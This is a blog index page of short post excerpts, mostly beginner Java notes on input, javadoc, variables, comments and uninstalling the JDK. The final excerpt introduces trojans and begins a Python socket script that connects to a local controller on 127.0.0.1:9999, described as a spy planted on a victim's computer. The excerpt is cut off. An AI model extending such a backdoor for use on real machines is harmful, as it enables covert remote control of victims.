摘要: nextline方法 public class demon02 { public class demon01 { } public static void main(String[] args) { Scanner scanner = new Scanner(System.in); System.o 阅读全文
posted @ 2026-08-16 22:26 EmberSeventh 阅读(4) 评论(0) 推荐(0)
摘要: 先打开open in explorer 通过命令生成文档(直接把文件进入cdm,输入javadoc) 阅读全文
posted @ 2026-08-15 17:39 EmberSeventh 阅读(5) 评论(1) 推荐(0)
摘要: ![屏幕截图 2026-08-14 145253](https://img2024.cnblogs.com/blog/3828621/202608/3828621-20260814145311346-1245250048.png) 阅读全文
posted @ 2026-08-14 14:53 EmberSeventh 阅读(5) 评论(0) 推荐(0)
摘要: 变量 可以变化的量 常量 final 常量名=值 阅读全文
posted @ 2026-08-13 23:18 EmberSeventh 阅读(4) 评论(0) 推荐(0)
摘要: ![image](https://img2024.cnblogs.com/blog/3828621/202608/3828621-20260813231702426-1037578513.png) 阅读全文
posted @ 2026-08-13 23:17 EmberSeventh 阅读(6) 评论(0) 推荐(0)
摘要: ![image](https://img2024.cnblogs.com/blog/3828621/202608/3828621-20260807163132202-2047682214.png) ![屏幕截图 2026-08-07 164606](https://img2024.cnblogs.com/blog/3828621/202608/3828621-20260807164615524-1 阅读全文
posted @ 2026-08-07 16:47 EmberSeventh 阅读(3) 评论(0) 推荐(0)
摘要: 注释 注释不会被执行。书写注释是一个非常好的习惯 单行注释 // 多行注释 /* */ doc /** */ 标识符 关键字 标识符注意点 数据类型 阅读全文
posted @ 2026-08-06 16:49 EmberSeventh 阅读(3) 评论(1) 推荐(0)
摘要: ![image](https://img2024.cnblogs.com/blog/3828621/202608/3828621-20260805163735308-1857279896.png) ![image](https://img2024.cnblogs.com/blog/3828621/202608/3828621-20260805164123472-761456459.png) 阅读全文
posted @ 2026-08-05 16:38 EmberSeventh 阅读(4) 评论(0) 推荐(0)
摘要: 卸载jdk 删除Java的安装目录 删除java_home 删除path下关于Java的目录 Java_version 阅读全文
posted @ 2026-08-04 17:13 EmberSeventh 阅读(5) 评论(1) 推荐(0)
摘要: 木马 寄生在一些软件 脚本 from socket import* import os s = socket() # 准备一个套接字 套接字申请连接后台的号码 s.connect(('127.0.0.1', 9999)) 本机测试:木马 127.0.0.1 安插在受害者电脑上的间谍 choice = 阅读全文
posted @ 2026-07-30 16:47 EmberSeventh 阅读(7) 评论(0) 推荐(0)